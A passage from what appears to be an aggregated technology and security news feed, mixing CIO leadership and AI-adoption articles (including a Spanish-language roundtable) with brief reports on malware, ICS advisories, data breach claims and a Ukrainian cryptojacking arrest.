implementation breaks under the weight of unresolved tensions. Strategies that ignore these embedded challenges such as conflicted decision-making, misaligned priorities and functional silos, lack the foundational conditions required for success. Yet many AI roadmaps still treat the org chart as fixed, decision-making as siloed, and value conflicts as someone else’s problem. Redesigning for AI means starting with the people and dismantling the legacy constructs that make collaboration optional rather than essential. One of the biggest mistakes I see is designing AI roadmaps around the technology, then attempting to retrofit them into the business. That’s backwards. Joshi, Su, Austin and Sundaram described this dynamic in their article “Why so many data science projects fail to deliver” as the classic “hammer in search of a nail.” You can’t drive adoption through capability alone. You drive it through behavior. Cross-functional alignment, proactive data sharing, surfacing uncertainty early and rapid testing aren’t just tactics. They are behavioral signals of a healthy culture that’s ready to absorb change.  If your AI roadmap doesn’t start with people, it’s already off course The uncomfortable truth is that many company cultures are barriers to AI adoption. The lack of investment in people, buy-in and alignment will continue to be an insurmountable friction point for organizations unwilling to confront the human side of transformation. Data leaders must stop seeing AI as a technical challenge and start leading like cultural architects because the organizations that will win with AI will be those that invest in behavior change and upskilling. That means sharing the vision early, involving your people in co-creation, upskilling for the future of work and rewarding behaviors that make adoption possible using the S.M.I.L.E. framework: Start AI roadmaps with a culture audit. Make behavioral metrics part of AI KPIs. Incentivize knowledge sharing, sharing data, aligning cross-functionally, admitting uncertainty and testing fast across silos. Lead with change management to drive alignment, accelerate adoption and ensure lasting impact, rather than treating it as an afterthought. Emphasize AI as an enabler of team augmentation, not a source of disruption. When all else fails, just S.M.I.L.E. This article is published as part of the Foundry Expert Contributor Network.Want to join?

The U.S. offers up to $10M for info on state hackers linked to RedLine malware and its creator, Maxim Rudometov, tied to attacks on U.S. infrastructure. The U.S. Department of State offers a reward of up to $10 million for information nation-state actors linked to the RedLine infostealer and its alleged author, Russian national Maxim […]

Data security firm MIND has raised $30 million in Series A funding to expand its R&D and go-to-market teams. The post MIND Raises $30 Million for Data Loss Prevention appeared first on SecurityWeek.

The rise in cloud breaches has been attributed to a series of factors

How would you like to earn yourself millions of dollars? Well, it may just be possible - if you have information which could help expose the identities of cybercriminals involved with the notorious RedLine information-stealing malware. Read more in my article on the Tripwire State of Security blog.

The ransomware group known as Qilin has allegedly updated its dark web leak site, claiming responsibility for attacks on 11 new victims spanning various sectors, including healthcare, government, technology, and manufacturing. The group has published the allegedly stolen data for each entity. The diverse list of targets underscores the opportunistic and far-reaching nature of modern […]

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released seven new ICS advisories, each highlighting cybersecurity vulnerabilities in key Industrial Control Systems across energy, communications, emergency response, and manufacturing sectors.   The alerts shed light on remotely exploitable flaws discovered in devices and software produced by CyberData, Hitachi Energy, and Mitsubishi Electric—names synonymous with modern operational technology (OT).   A Breakdown of the Latest ICS Advisories  The first advisory, ICSA-25-155-01, addresses multiple high-impact issues in CyberData’s 011209 SIP Emergency Intercom. With a CVSS v4 severity score of 9.3, this vulnerability, reported by Claroty researcher Vera Mens, enables authentication bypass, SQL injection, and path traversal. Affected systems using firmware versions prior to 22.0.1 are vulnerable to remote code execution and denial-of-service attacks. CISA recommends upgrading to version 22.0.1 and advises isolating the intercoms from public networks using firewalls and VPNs.  The second alert, ICSA-25-155-02, involves a critical integer overflow in Hitachi Energy’s Relion 670, 650 series, and SAM600-IO devices. The flaw resides in the VxWorks OS memory allocator and holds a CVSS v3 score of 9.8. Exploitation could lead to memory corruption, potentially crippling protective relays in power systems. Multiple firmware subversions across series 1.1 to 2.2.5 are affected. Mitigation entails upgrading to version 2.2.5.2 or applying interim workarounds provided by Hitachi.  ICSA-21-049-02 (Update H) highlights vulnerabilities in Mitsubishi Electric’s broad range of FA Engineering Software, such as GX Developer, GT Designer3, and RT ToolBox2. With a CVSS v4 score of 8.7, attackers can exploit heap-based buffer overflows to crash the software or interfere with PLC diagnostics in factory automation environments. Users are advised to install the latest updates—e.g., GX Developer version 8.507D+ and RT ToolBox2 version 3.74C+.  Continued Focus on Hitachi Energy’s Industrial Control Systems  CISA’s June release includes updates to prior ICS advisories concerning Hitachi Energy’s Relion products and IEC 61850 MMS Server implementations. Notable among them:  ICSA-25-133-02 details CVE-2023-4518, where malformed GOOSE messages could cause vulnerable Relion firmware versions to reboot, creating a denial-of-service condition. Firmware series 2.2.0.x to 2.2.5.6 are affected, and the agency recommends upgrading to secure versions such as 2.2.2.6 or 2.2.3.7.  ICSA-23-068-05 (CVE-2022-3864) uncovers weaknesses in firmware signature validation. If exploited by an authenticated attacker, this vulnerability could lead to unauthorized firmware uploads. Affected firmware spans across versions 2.2.0 to 2.2.5.5.  ICSA-21-336-05 is about outdated VxWorks boot components in the Relion series. CVE-2021-35535, with a CVSS v4 score of 8.9, references known “Urgent/11” vulnerabilities that could allow TCP session hijacking or packet injection. Users must patch to at least version 2.2.2.5 or apply physical and network isolation strategies.  ICSA-23-089-01 points to a medium-severity issue (CVE-2022-3353) in Hitachi’s IEC 61850 MMS Server, where malformed client requests can block new connections. Though scoring a 5.9, it could still disrupt operations under targeted conditions.  Conclusion   CISA’s latest ICS advisories highlight the urgent need for critical infrastructure operators to secure vulnerable systems against remote exploitation. With many legacy ICS components lacking basic protections, the risks are growing, but so are the tools. CISA’s guidance offers a clear roadmap: patch systems, segment networks, restrict access, monitor threats, and train staff.

Cybersecurity involves both playing the good guy and the bad guy. Diving deep into advanced technologies and yet also going rogue in the Dark Web. Defining technical policies and also profiling attacker behavior. Security teams cannot be focused on just ticking boxes, they need to inhabit the attacker’s mindset. This is where AEV comes in. AEV (Adversarial Exposure Validation) is an advanced...

Join us for an interactive online session designed for those new to threat hunting in the Silent Push platform. Adversary infrastructure is often hidden or unused—escaping detection by most CTI tools — until it’s suddenly activated in an attack. Learn how to uncover the 98% of malicious infrastructure that typically goes undetected. We’ll show you […] The post Workshop – Pivoting Across Infrastructure to Detect Unknown Threats appeared first on Silent Push.

A Russia-linked threat actor has used the destructive malware dubbed PathWiper against a critical infrastructure organization in Ukraine. The post Destructive ‘PathWiper’ Targeting Ukraine’s Critical Infrastructure appeared first on SecurityWeek.

Leading a technical team, being the voice of technology in the C-suite, and communicating with your company’s business groups about their IT needs and hazards is a job that requires a deep understanding of technology. But more and more, it also requires the skills of an expert negotiator, speech writer, and public relations expert. In a single day, perhaps even in a single hour, you might go from explaining a technical decision to a financial executive to listening to an acronym-laden description of the hiccups in an AI deployment. As business communication expands across channels and technology evolves into the beating heart of the business, the role of the technical leader has become one that requires strong communications skills. More than that, it requires a big-picture communication strategy that is clear and effective. I asked CIOs and other leaders what they do. This is the advice they offered on developing an effective communication strategy for IT leadership. Speak in the vernacular of your audience When discussing the details of a technical implementation with your team, your language might be littered with acronyms, jargon, and highly technical language. But when you speak to other business groups, company leaders, and less technical people, you will miss the mark if you speak in the vernacular of the nerd. “Talking to the engineering team is a very different conversation than talking to the executive team,” says Eric Johnson, CIO at PagerDuty. “Technical speak is the kiss of death for a CIO.” For a less technical audience, shift to storytelling. Adopt the dialect of the business units, focus on the business problem the technology solves, and leave the specs and speeds out of it altogether. “Think about your audience,” says Guillermo Carreras, AVP of delivery at BairesDev. “Do you need to get into the detailed technical execution or is the overall vision enough? Is the result more important than the implementation? Should you use simple language instead of technical jargon?” The channel you use to discuss topics is part of this equation. Some people want to read specs, some conversations should be done face to face, and there are times when email is the best way to deliver news. With so many channels for communicating your message, the lingua franca you choose is as much about the forum as it is about the words you use. Use every communication channel you have “You cannot communicate enough, and you must use every method available: Slack channels, all-hands meetings, blogs, internal web pages, sharing mission, publishing roadmaps, etc.,” says Ann Funai, CIO and VP of business platform transformation at IBM. You might have a personal preference for email, Slack, or the phone. You might prefer never to receive a work text. But you have to meet your team and the C-suite where they are. “People are going to communicate with you in whichever way is more natural and effective for them and you have to be able to manage that communication,” PagerDuty’s Johnson says. “Some folks like content coming through Slack, others absorb it better visually in a town hall, and some want office hours. As a CIO, you have to be proficient in all of those things.” Keep in mind, though, that these channels can spin out of control without guardrails, rules about engagement, and protocols. As the technical lead, establishing these rules will likely fall to you. Define how best to use each channel Many people and companies allow personal preferences to define the forum they communicate in. But personal preference is not the only — or even the best — way to define how you use channels. For Energy Solutions CIO David Weisong’s teams, the channel is governed by the urgency and type of message. Email is reserved for conveying announcements that aren’t pressing, while certain Slack channels and SMS messages are akin to red alerts. The company doesn’t use email for urgent messages because there is an agreement that emails can be dealt with anytime in, say, 24 hours. But when the message arrives via an urgent channel, you drop everything and pay attention. This, of course, includes an agreement that the emergency channels will never be used for frivolous or non-urgent messages. For Sudhakar Velamoor, CTO of Kalderos, the channel is often governed by the technical level of the topic. “We go to Slack when we are trying to be specific,” he says. “You can convey an idea in a meeting or video call. But there is more precision in a Slack conversation.” The asynchronous nature of Slack also allows time to form a precise answer. Keep context front of mind Whatever channel you use, it is important to keep the high-level message clear. “Make sure people understand where the conversation is coming from,” says Velamoor, “especially for technology teams communicating specifications. Set up the context so people understand what they’re reading and why they’re reading it.” Without this high-level clarity, it is easy for communication to slide away from the goal and deliver an unintended message. “We start with how we are doing against our OKRs,” says Cameron van Orman, chief strategy officer at Planview, referring to the objectives and key results (OKR) goal-setting framework. “We have all-hands meetings, a company kickoff,” he says, along with all the usual channels of communication. Everyone makes sure these objectives are front and center in those. “But what’s more interesting is that they live and are visible in our tooling, in our agile planning software.” Often, van Orman says, objectives — financial goals and product goals, for example — are looked at only occasionally. “OKRs are often in a performance management system or parked in a finance tool,” he says. Keeping these OKRs front and center flips the focus from the project to the outcome. It changes the mindset. “It is subtle,” he says. “But it’s impactful to start by asking if we are doing the right things.” Velamoor agrees. “Connect your work to the overall business goal,” he says. “This can make priorities change, especially in a dynamic environment. Set the context and the business goal you are marching toward.” Use face-to-face meetings to strengthen other channels Communicating with a remote team brings its own challenges. If all communication happens through email, video calls, and messaging, some of the connective tissue of human interaction gets lost. Energy Solutions discovered this in exit interviews, Weisong says. People were leaving, especially those relatively new to the workforce, because they didn’t feel connected to the job or company. To answer this, the company now invests in regular, company-wide, in-person meetings and asks new hires to work at one of the company’s offices. This has helped provide a foundation for new people to attach to. “It’s like when you plant a tree, you put a stake next to it to keep it growing up and not get blown over. So, it can take root,” he says. The effort has been very effective at providing new team members with cohorts, colleagues, and a sense of belonging. The connection these in-person meetings create bolsters the communication among everyone in the company, too. When you know someone, even only slightly, their messages come with a more accurate flavor of their personality and style. “It makes interactions through other mediums easier,” says Weisong. “You have a basis for understanding that person.” Train people to communicate Communication is complicated. Not everyone is good at it. Because of this, most leaders I spoke to make it a part of their communications strategy to teach this skill. This might include the specific rules around communicating — what’s private, what channels should be used, what content is contractually sensitive — but some of it is more general, such as when to escalate a chat to a meeting, what sort of topics should be discussed in person or at least on video, how to be respectful, what is rude, when behavior crosses over into harassment. “We have a big initiative around confidential and proprietary information,” says Energy Solutions’ Weisong. “We’ve trained for that as a company. And then things like security, compliance, and risk are woven in. We also teach what can and cannot be shared in Slack channels.” The company’s communication training also covers basic guidelines about how to avoid and handle conflict, when to escalate a conversation to a phone call or Zoom meeting, and how to be sure your message was received.    Learn to listen When you are communicating, you have to do more than look for effective ways to convey your message. Real communication is like a telephone: It works in both directions. If you are speaking but not listening, you aren’t communicating. “Learn to listen and invest time in doing so,” says Carreras. “Your team has valuable input. Make time to connect with them and actively listen to their concerns, suggestions, and ideas. This will elevate your communication skills and help you build a great relationship with them.” Be sure you aren’t only listening to people who agree with you or tell you what you want to hear, though. This has been the downfall of many great leaders. When you listen only to messages that are easy to hear, you become isolated and disconnected. “Create space for perspectives that differ from your own,” IBM’s Funai says. “We must be willing to evaluate and weigh different viewpoints so that we can come to a solution that benefits key stakeholders and the business overall.” Develop a communication cadence Daily Slack conversations, stand-up meetings, and emails are usually focused on the work at hand and leave little room to connect with your teams, colleagues, or other business leaders about the big picture or the personal. Connecting around these things, though, is the fabric of communication. It holds everything else together. “I have found it to be incredibly helpful to force a regular cadence into conversations with key business partners,” PagerDuty’s Johnson says. “There’s so much information flying around and things happen quickly. If you don’t have regular check-ins, where you review the status of shared priorities and consider anything new, things get out of alignment.” This is true in every relationship you have in your organization — from the leadership team to the people who look to you for guidance. “I meet with every single person in my department,” says Weisong. “I see some of these people every other day in meetings. But that is all about the agenda. I need to make sure I understand how they are doing on a personal level, what’s going on at the project level, and to have discussions that are not scripted or focused on an agenda.” Adding this layer of cadenced check-in to an already busy schedule can feel like a burden. But it is worth the effort. “Effective communication improves culture,” says Velamoor. “When you improve the culture and the collaboration, it provides a lot of dividends to both you and your customers.”

Blitz malware, active since 2024 and updated in 2025, was spread via game cheats. We discuss its infection vector and abuse of Hugging Face for C2. The post Blitz Malware: A Tale of Game Cheats and Code Repositories appeared first on Unit 42.

STC Kuwait, a major telecommunications provider in the country, has allegedly suffered a significant data breach. A threat actor has posted on a dark web forum claiming to be in possession of sensitive personal information belonging to over 300 employees of the company. STC Kuwait, a subsidiary of the stc Group, is a key player […]

Kaspersky GReAT experts describe the new features of a Mirai variant: the latest botnet infections target TBK DVR devices with CVE-2024-3721.

In the dynamic global context of battling for IT talent, where ​​in Spain alone new estimates from DigitalES show there are up to 120,000 unfilled positions, BBVA Technology has made the problem its main strength. Since last year, the digital bank has grown its employee base by around 30% across its offices in Madrid, Bilbao, and Barcelona. And following the recent completion to integrate its three technology companies — Next Technologies, IT España and Datio — it’s now fortified with the in-house talent that can maximize software development and tech skills. “We needed an attractive brand to serve as a foundation for the growth we’ve experienced in our workforce,” says CEO Ricardo Jurado. But while the merger process wasn’t easy, it was essential to build consistent processes and culture. “We also suffered from the skills gap,” he adds, but the key to addressing it was having an attractive value proposition for employees and potential recruits, while improving employment metrics for underrepresented groups. Recipe for success Jurado details a team composed of approximately 50% developers, 15% technical architects, and a deep bench of different types of data, systems, and security engineers. “We have reason to be proud because we’ve grown and we’ve done so with quality,” he says. Compared to how things were structured before, with three separate tech companies, the current consolidated BBVA Technology focuses on the bank itself without having to provide external services to the market. “Our employees are involved in the technological foundation of any project the bank has,” he says. Above all, the company’s most visible, and most competitive, feature is the app, due to its operational efficiency and mobile capabilities. And a recent updated version of it powered by AI marks a turning point in digital banking, Jurado says, with a firm commitment on improved user experience, from a financial coach and personalized savings plans, to more intuitive and simple ways to make payments. The paradigm of AI When applied to BBVA Technology’s operations and its talent, Jurado sees AI use in everything related to staff retention and attraction. “We’ve adjusted our training offering with new content almost immediately,” he says. “In this sense, we believe it’ll help us detect knowledge gaps and propose customized paths for each person.” Steady progress is essential, though, without getting overwhelmed with tools that might not be practical. Bottom line is progress has to be compatible with concepts of the business plan, such as security, ethics, and responsibility. It’s important to stay grounded with AI, and be confident it won’t replace software developers, but rather empower BBVA’s entire global software development unit, which identifies best practices and guarantees productivity. “From Spain, we’ve been driving many of these, such as agile methodologies or DevOps,” he says. “AI is just another addition to all of this.” After all, Jurado sees all technology as an enabler. For the past decade, he says, the bank has thrived with digitalization. “I think the turning point was when we realized digital transformation for the business is always ongoing,” he says. “This is a long-distance race.”

Cisco has released patches for a critical vulnerability impacting cloud deployments of Identity Services Engine (ISE). The post Cisco Patches Critical ISE Vulnerability With Public PoC appeared first on SecurityWeek.

The Chinese AI-powered recruiting platform, MoSeeker, has allegedly been compromised, with a threat actor claiming to sell a full database dump containing 40 million records for $1200. The sale was announced on a dark web forum, putting the sensitive information of millions of job seekers and companies at risk. MoSeeker, based in Shanghai, is a […]

The business landscape has undergone a dramatic shift in recent years.  Ecosystems have become highly complex and interconnected, with value chains becoming increasingly non-linear. This hyperconnectivity demands seamless collaboration and real-time communication across a vast network of employees, partners, suppliers, and customers.  Businesses need to rethink their digital strategies to ensure a frictionless experience for all stakeholders within their ecosystem. However, delivering this frictionless experience is not easy, as CIOs face the challenges of integrating and managing a complex array of technologies, often with a mix of legacy tools and infrastructure. Tata Communications’ Digital Fabric aims to address these challenges by offering a unified platform that simplifies management, enhances visibility, and provides a secure foundation for building hyperconnected ecosystems. It includes infrastructure, platform, and tools brought together through an orchestration layer to enable better visibility, control, and manageability across the IT landscape. Organisations can expect: Improved experiences – Seamless interactions between employees, customers, partners, and other stakeholders. Reduced complexity – Integration of disparate tools and systems for easier management. Enhanced security – A secure-by-design approach to protect your digital infrastructure. Scalability – Designed to adapt and grow as your business needs evolve. Digital Fabric has several components, including network fabric, cloud fabric, interaction fabric, and Internet of Things fabric, which are all secure by design and bolstered by our end-to-end managed services. The building blocks of the future of network Enterprises are adopting modern applications and moving away from monolithic ones. On the other hand, traditional network and security architectures are perimeter-bound and cannot cope with network infrastructure and security demands. This limits the effectiveness of modern applications, hybrid cloud adoption, and hybrid working productivity. Additionally, network and security continue to be organisational silos with teams managing separate KPIs and priorities, making it challenging to take on IT modernisation and convergence projects. Tata Communications’ Network Fabric provides a right-fit, resilient, and programmable network with global reach to cater to future needs. It includes global network infrastructure made programmable through on-demand capabilities, managed LAN and WAN solutions such as managed Wi-Fi, SD-WAN, and integrated network and security through our managed SASE offering.  This portfolio consists of the following domains: Contextual Wi-Fi and LANTata Communications’ Managed Services is a one-stop solution for Wi-Fi and LAN implementation and management. It offers the best-fit solution, including site survey, consulting, technology OEM selection, network configuration, deployment, and lifecycle maintenance. It helps with wireless devices, users, and access permission management, as well as location-specific analytics to support business growth. Predictable and programmable hybrid WANTata Communications’ programmable and performant network provides operational visibility, simplified management, and greater dependability. The offerings include Private Lines and Internet Access Services for core connectivity requirements. It also features IZO™ Internet WAN, the world’s first end-to-end predictable internet for business, offering consistent performance, high availability internet services with dedicated, broadband, 4G/5G, LEO Satellite internet access in over 150 countries. Software-defined multi-cloud connectivityThe cloud connectivity solution IZO™ Multi Cloud Connect provides high-speed, on-demand, pay-as-you-go software-defined cloud interconnect (SDCI) with configurable virtual network Functions (VNFs). It is an API-enabled agile platform with comprehensive traffic reporting and analytics. Intelligent overlay through managed SASETata Communications’ Managed SASE (Secure Access Service Edge) represents the convergence of networking and security. It brings together the modern networking architecture of SD-WAN with security service edge, firewall-as-a-service, zero trust network access, secure web gateway, and cloud access security broker. It also provides a single-pass architecture that secures private apps, users, and internet traffic from web, cloud, and network-based threats. Future-proof your network with comprehensive NaaS solutions To address enterprise network needs, Tata Communications’ Network-as-a-Service (NaaS) solutions are multi-domain, offering full end-to-end NaaS coverage of on-premises network, underlay WAN, cloud-delivered security, and multi-cloud connectivity. It is designed to meet changing market requirements effortlessly by scaling underlying networks in minutes, as well as ensure consistent security policy regardless of user and endpoint locations with a pay-per-use model. Self-service portals further enable users to spin up new resources and network bandwidth within minutes. By removing the need to overprovision cloud connectivity for site-to-cloud, cloud-to-cloud, and cloud-to-SaaS use cases, enterprises can reduce cloud egress costs and enjoy OPEX savings. At a glance, Tata Communications offers: SD-WAN-as-a-Service that simplifies the SD-WAN offering with a cloud-like consumption model Core Network On-Demand, featuring zero-based bandwidth with connectivity activated in minutes WI-Fi & LAN-as-a-Service with no minimum commitment, zero obsolescence, and zero technical debt Monitoring-as-a-Service that enables faster fault identification with proactive 24/7 real-time monitoring Hosted SASE with a single-pass architecture for end-to-end visibility and context-led insights These solutions have empowered enterprises across various industries. An example is Hager Group. The German manufacturer of electric installation systems enjoyed the benefits of a global cloud-ready network, resulting in a better user experience after Tata Communications helped transform its network that connects over 80 locations with Managed SD-WAN and IZO™ WAN. Antonio Gelardi, Senior Manager, Network and Security, Hager Group, cited significant improvements in productivity and user experience. Find out more about Tata Communications’ Secure Network Transformation and Network-as-a-Service offerings.

Zlgoon Inc., a prominent Online-to-Offline (O2O) company in South Korea, has allegedly suffered a significant data breach. The company, known as a leading provider of mobile coupons for the popular messaging app KakaoTalk, is at the center of a security incident after a threat actor advertised a database containing the records of 1.1 million customers […]

This week, we turn our attention to the approaching holiday season. Scammers don’t take holidays. On the contrary, they increasingly target acting financial officers with CEO fraud schemes while the regular staff are away. We also highlight growing cooperation in the field of cybersecurity and introduce new legislation aimed at improving the security of wireless devices.

This week, we turn our attention to the approaching holiday season. Scammers don’t take holidays. On the contrary, they increasingly target acting financial officers with CEO fraud schemes while the regular staff are away. We also highlight growing cooperation in the field of cybersecurity and introduce new legislation aimed at improving the security of wireless devices.

El impacto del auge de los agentes de IA, a tenor de lo relatado por los asistentes al debate, realizado el pasado 3 de junio en Madrid y moderado por Esther Macías, directora editorial de CIO ESPAÑA, no se va a hacer esperar en nuestro país. Desde un agente multiconversacional capaz de vender un coche desde la web al usuario final hasta aquellos que ayudan a los médicos a analizar imágenes, los responsables tecnológicos de distintas organizaciones fueron desgranando los casos de uso que sus empresas ya han puesto en marcha o esperan arrancar en los próximos meses.  Algunas de ellas emplean los agentes en procesos de back-office, otras automatizan procesos en las aduanas, y otras buscan servirse de esta tecnología para atender las demandas de estudiantes, que buscan profesores disponibles 24 horas para resolver sus dudas antes de los exámenes. No en vano, la inteligencia artificial agentiva propone introducir sistemas altamente automatizados capaces de percibir información, tomar decisiones y actuar con mínima intervención humana.  Sin embargo, todo esto no es posible si no aseguramos la calidad y el control del dato. “La IA agentiva es la punta del iceberg. Para construir algo positivo tenemos que basarnos en algo sólido”, explicó Sergio Rodríguez, director de tecnología de Puedata, consultora especializada en proyectos de datos e IA. Para este experto, la clave para una mayor adopción de esta tecnología residirá en encontrar casos de uso que no se puedan resolver de forma tradicional. Su compañera Lucía Ferrer, directora comercial de la compañía, explicó que su compañía atraviesa un “momento dulce” ante el aumento de la demanda de proyectos de datos, algo en lo que la firma lleva trabajando diez años. “Hoy algunos CEO piden hablar con los datos en tiempo real en lenguaje natural”, explicó.  Juan Márquez | Foundry. En la imagen, Sergio Rodríguez de Guzmán (Puedata). No obstante, remarcó la importancia de trabajar con datos de calidad para que los modelos sean operativos. “Los proyectos de IA tienen una tasa de abandono muy alta porque el usuario se cansa. Si el modelo responde mal, lo abandonas”, añadió.  Patricia Novo, ejecutiva de cuentas en Databricks, explicó que su compañía, pionera en el concepto ‘lakehouse’, se enfoca en desarrollar casos de uso en un momento donde la IA agentiva está lista para escalar. “Invertimos mucho en los asistentes para que los usuarios puedan interactuar en lenguaje natural”, aseveró. “Un sistema agentivo son inteligencias artificiales pilotadas por un máster. Hay que evaluar cómo funciona, hay que ponerles jueces y esos jueces son otra IA. El reto es cómo evaluar ese sistema”, añadió.  Retos: talento, velocidad y miedo al cambio  El encuentro también abordó los principales retos a los que debe hacer frente una organización para implantar agentes de IA. Para Ubaldo González, CDO (director de datos) de Mapfre España, el principal de ellos es el talento. “Hacemos un esfuerzo sobrehumano por atraerlo y retenerlo, pero es que además os encontramos resistencia al cambio incluso en el propio talento”, aseveró. “Con la IAG somos capaces de hacer el trabajo tres veces más rápido, pero los programadores tradicionales están viendo una amenaza en ella”, explicó.  Un reto que se extiende también al ámbito académico. Luis Miguel Garay, director de Ciencias de la Computación y Tecnología de la Universidad Internacional de La Rioja (UNIR), explicó que los alumnos buscan profesores con experiencia en esta materia, algo difícil de encontrar. “Hay que gestionar la ansiedad que genera la IA en los CEO, pero también en los alumnos”, afirmó.  Juan Márquez | Foundry. En la imagen, Patricia Novo (Databricks). Otro reto es la velocidad a la que desarrolla esta tecnología, que complica su adopción para algunas organizaciones. “Si te metes a hacer personalizaciones de agentes, has perdido el tren, y la inversión”, apuntó Marta Salas, directora de IA en la Universidad Francisco de Vitoria.  “Cuando la educación va más rápido que la tecnología, se genera prosperidad. Cuando es al revés se genera sufrimiento”, dijo Antonio Serrano, coordinador de digitalización e innovación de la Universidad Rey Juan Carlos I. El académico, también abogado y empresario, explicó que la correcta implantación de la inteligencia artificial agentiva para necesariamente por cuatro “es”: esfuerzo, excelencia, ética y educación.  Otro reto apuntado por los asistentes es combinar las altas expectativas generadas por la IA agentiva en los comités de dirección con la fría acogida por parte de algunos empleados. “El reto no es convencer a la alta dirección, sino más bien frenarlos, porque cuando llega al resto de la organización y tiene que cambiar su forma de trabajar no es tan fácil implicarlos”, sostuvo Carlos Garriga, CIO de IE University.  “Todo el mundo quiere probar, darle al botón. El negocio pide magia, pero para eso es necesario tener inteligencia de la buena. Si los datos no tienen calidad es difícil sacarle partido a la IA”, dijo Cristina Cid, subdirectora de Transformación Tecnológica de Correos, quien coincidió también en apuntar a la velocidad de esta tecnología como uno de los principales obstáculos para su implantación.  Juan Márquez | Foundry Pensamiento crítico: la clave para gobernar la IA generativa  En lo que todos los asistentes coincidieron fue en la importancia del pensamiento crítico para gobernar la inteligencia artificial generativa. “Hay que saber ser crítico con lo que la IA generativa te ofrece. El humano todavía es extremadamente necesario. Si no eres crítico, esta tecnología puede ser insostenible”, dijo Sergio Rodríguez, CTO de PueData.  “La realidad es que nos creemos directamente lo que sale de la IA generativa. Está diseñada para ello”, dijo Marta Salas, quien reveló que un estudio de Microsoft demuestra que un porcentaje muy alto de la población da por buenos los resultados que saca Copilot sin hacer posteriores comprobaciones. “Hay que transformar los interfaces para que nos ayuden a tener pensamiento crítico”, subrayó.   Mariano Ventosa, vicerrector de Profesorado, Investigación e IA de la Universidad Pontificia de Comillas, expresó también por su preocupación antes los costes que puede tener la IA agentiva en un escenario donde los precios suban si hay pocos proveedores. Un aspecto que, sin embargo no preocupa a Patricia Novo. “Hemos visto a los hiperescalares preocuparse por la energía que necesitaban los data centers y al final DeepSeek ha demostrado que no hace falta tanta energía. Mi sensación es que la IA se va a hacer más eficiente. Hay un movimiento open source muy fuerte y Databricks aboga por ello”, afirmó.  Para Jesús Domínguez, arquitecto empresarial principal de Roche, el principal reto está en la integración de los datos, mientras que para Sergio López Salazar, responsable de la oficina tecnológica de proyectos de Lefebvre, está en convencer a mucha gente del valor de la IA generativa. “Tenemos que gestionar las expectativas del Comité de Dirección”, añadió Joaquín Corral, director global del servicio de sistemas de TI de Avolta.  En suma, distintos retos para afrontar un salto que ya parece inevitable. Del dato a la decisión autónoma de la mano de la IA agentiva, una tecnología que permitirá acercarnos al futuro el futuro optimizando operaciones si somos capaces de resolver con eficiencia los retos que aún presenta en 2025.

For years, he stayed under the radar. No ransomware, no flashy data leaks, no digital fingerprints loud enough to cause alarm. Just a quiet tapping of server power, thousands of machines working overtime, all without their owners knowing. Now, that silence has been broken. Cyber police in Ukraine’s Zaporizhzhia region say they have exposed a 35-year-old man from Poltava behind a cryptocurrency mining scheme that compromised over 5,000 customer accounts of a major international hosting provider. His goal wasn’t to steal data. It was to steal computing power, and he did it well. Authorities say the operation caused more than $4.5 million in losses and involved a web of forged credentials, remote-access tools, crypto wallets, and hacked virtual machines quietly mining digital currency across servers that didn’t belong to him. A Long Game, Played Quietly This wasn’t a smash-and-grab. It was slow, careful, and calculated. According to Ukraine’s Cyber Police Department, the suspect had been collecting intelligence since 2018, scanning the internet for exposed systems, unpatched servers, and any hint of weakness that could be exploited. When he found one, he’d move in quietly, no warnings triggered, no obvious breach. Eventually, he found a goldmine, a hosting company with global reach. The firm isn’t being named, but investigators say its services powered thousands of websites, apps, and digital platforms. More importantly, it provided rented server space to customers, space the hacker would soon make his own. Virtual Machines, Real Money With access to over 5,000 customer accounts, the man started deploying unauthorized virtual machines, digital computers within computers, on those servers. These machines were programmed for one thing: mining cryptocurrency. On paper, it’s not the kind of cybercrime that makes headlines. No one’s identity was sold, no ransomware splash screen popped up. But behind the scenes, the servers were working overtime, burning electricity and resources for a criminal’s payday. By the time investigators caught on, the damage was done. The hosting company reported losses nearing $4.5 million, money lost to unauthorized computing, bandwidth strain, and inflated infrastructure costs. And while the victims were companies, not individuals, the scale and stealth of the crime drew international attention. Zaporizhzhia Cyber Police Takedown The takedown wasn’t easy. The suspect didn’t stay in one place. He moved around between Poltava, Odessa, Dnipro, and Zaporizhzhia, regions across Ukraine, making it harder to trace him. But eventually, police locked in. With support from Europol and the Department of International Police Cooperation, cyber police raided multiple locations tied to the suspect. What they found confirmed everything. Among the evidence seized: Computer equipment used for mining and remote access Phones and bank cards linked to crypto transactions Email credentials are used to compromise accounts Custom mining scripts and hacker tools Crypto wallets holding proceeds from the illegal mining Investigators also found active profiles on underground forums where the man had engaged in cybercrime discussions, bought tools, and likely sold access or services. What Happens Next The suspect is now facing serious charges under Part 5 of Article 361 of Ukraine’s criminal code — unauthorized interference in information systems. If convicted, he could face up to 15 years in prison, along with a ban on working in tech-related roles for at least three years. The pre-trial investigation is still ongoing, and authorities say more charges could follow depending on what additional digital evidence reveals. Conclusion Cryptojacking, the act of hijacking machines to mine crypto, often flies under the radar. It doesn’t trigger panic like a data breach, and victims often don’t even realize it’s happening. But as this case shows, the impact is real, the losses are massive, and the technology is increasingly easy to abuse. This incident also highlights a truth: cybercrime doesn’t always come with drama. Sometimes, it’s just one man with a laptop, patience, and access. And sometimes, that’s all it takes.

Law enforcement authorities from over a dozen countries have arrested 20 suspects in an international operation targeting the production and distribution of child sexual abuse material.

An HPE StoreOnce vulnerability allows attackers to bypass authentication, potentially leading to remote code execution. The post HPE Patches Critical Vulnerability in StoreOnce appeared first on SecurityWeek.

A reward is being offered for Maxim Alexandrovich Rudometov, who is accused of developing and managing the RedLine malware. The post US Offering $10 Million Reward for RedLine Malware Developer appeared first on SecurityWeek.

A critical infrastructure entity within Ukraine was targeted by a previously unseen data wiper malware named PathWiper, according to new findings from Cisco Talos. "The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across...

HUMAN’s Satori Threat Intelligence and Research team, in collaboration with Google, Trend Micro, and Shadowserver, has uncovered and partially disrupted a massive cyber fraud operation named BADBOX 2.0. This operation, an evolved iteration of the original BADBOX malware disclosed in 2023, has infected over 1 million Android Open Source Project (AOSP) devices worldwide, marking it […] The post BADBOX 2.0 Malware Hits Over a Million Android Devices in Global Cyber Threat appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

